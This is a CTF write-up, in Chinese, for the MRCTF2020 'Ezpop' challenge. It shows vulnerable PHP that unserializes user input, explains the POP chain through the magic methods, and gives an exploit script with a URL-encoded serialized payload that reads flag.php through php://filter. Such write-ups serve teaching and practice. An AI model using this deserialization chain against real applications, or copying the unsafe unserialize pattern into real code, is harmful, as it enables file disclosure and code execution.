[MRCTF2020]Ezpop
<?php
//flag is in flag.php
//WTF IS THIS?
//Learn From https://ctf.ieki.xyz/library/php.html#%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E9%AD%94%E6%9C%AF%E6%96%B9%E6%B3%95
//And Crack It!
class Modifier { 第一个类
protected $var;
public function append($value){
include($value); 文件包含,显然是我们找flag的关键
}
public function __invoke(){
$this->append($this->var); 调用_invoke()方法时,调用append函数
} 而调用_invoke()方法的要求是以调用函数的方式调用一个对象,也就是Modifier对象
}
class Show{ 第二个类
public $source; Show类里面有$source和$str两个public类型的变量
public $str;
public function __construct($file='index.php'){
$this->source = $file;
echo 'Welcome to '.$this->source."<br>";
}
public function __toString(){
return $this->str->source; str里面的source变量,可以让str为一个类
} 而Test类里面没有source这个变量,如果令str=new Test(),就能调用_get()方法
public function __wakeup(){ 反序列化时调用,显然是要调用的
if(preg_match("/gopher|http|file|ftp|https|dict|\.\./i", $this->source)) {
echo "hacker"; 正则匹配,就是当作字符串处理,会调用__toString()
$this->source = "index.php"; 所以令source=一个类
}
}
}
class Test{
public $p; Test类里面的$p变量
public function __construct(){
$this->p = array(); new Test()时,$p为数组
}
public function __get($key){ 调用_get()时,以函数的形式返回$p数组
$function = $this->p;
return $function();
}
}
if(isset($_GET['pop'])){
@unserialize($_GET['pop']);
}
else{
$a=new Show; 调用_construct()方法
highlight_file(__FILE__);
}
相关魔术方法
__construct() 当一个对象创建时被调用
__toString() 当一个对象被当作一个字符串使用
__wakeup() 将在反序列化之后立即被调用(通过序列化对象元素个数不符来绕过)
__get() 获得一个类的成员变量时调用
用于从不可访问的属性读取数据
#难以访问包括:(1)私有属性,(2)没有初始化的属性
__invoke() 调用函数的方式调用一个对象时的回应方法
现在来分析一下流程
- 首先反序列化调用
__wakeup()
方法 - 令
source
=new Show()
后__wakeup()
会调用__toString()
- 令
$str
=new Test()
就会调用__get()
方法 - 令
p
=new Modifier()
就会调用__invoke()
,然后命令执行
<?php
class Modifier {
protected $var="php://filter/read=convert.base64-encode/resource=flag.php";
}
class Test{
public $p;
}
class Show{
public $source;
public $str;
public function __construct(){
$this->str = new Test();
}
}
$a = new Show();//此时source(show)->str
$a->source = new Show();//source(show)->str之后触发__tostring然后访问source(test)触发__get
$a->source->str->p = new Modifier();//__get返回的p触发__invoke
echo urlencode(serialize($a));
?>
//O:4:"Show":2:{s:6:"source";O:4:"Show":2:{s:6:"source";N;s:3:"str";O:4:"Test":1:{s:1:"p";O:8:"Modifier":1:{s:6:" * var";s:57:"php://filter/read=convert.base64-encode/resource=flag.php";}}}s:3:"str";O:4:"Test":1:{s:1:"p";N;}}
payload
?pop=O%3A4%3A"Show"%3A2%3A%7Bs%3A6%3A"source"%3BO%3A4%3A"Show"%3A2%3A%7Bs%3A6%3A"source"%3BN%3Bs%3A3%3A"str"%3BO%3A4%3A"Test"%3A1%3A%7Bs%3A1%3A"p"%3BO%3A8%3A"Modifier"%3A1%3A%7Bs%3A6%3A"%00%2A%00var"%3Bs%3A57%3A"php%3A%2F%2Ffilter%2Fread%3Dconvert.base64-encode%2Fresource%3Dflag.php"%3B%7D%7D%7Ds%3A3%3A"str"%3BO%3A4%3A"Test"%3A1%3A%7Bs%3A1%3A"p"%3BN%3B%7D%7D